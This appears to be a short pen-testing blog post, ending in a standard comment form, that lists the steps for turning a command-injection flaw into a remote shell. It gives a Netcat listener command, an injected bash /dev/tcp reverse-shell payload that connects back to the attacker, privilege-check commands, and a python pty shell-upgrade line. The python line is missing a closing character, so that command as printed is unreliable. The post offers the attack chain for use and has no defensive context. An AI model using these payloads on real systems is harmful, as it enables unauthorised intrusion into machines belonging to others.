To create a shell on a machine vulnerable to command injection

Setup a listener on Kali using Netcat

nc -nlvp 4444

Use the following to connect back to the listener from the target:

; bash -i>&/dev/tcp/LOCALIP/4444 0>&1

Use the following to find out your user and privileges:

whoami
id

To create a more interactive shell from the netcat shell try:

python -c 'import pty;pty.spawn("/bin/sh")

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Connecting to %s

%d bloggers like this:

Pen Testing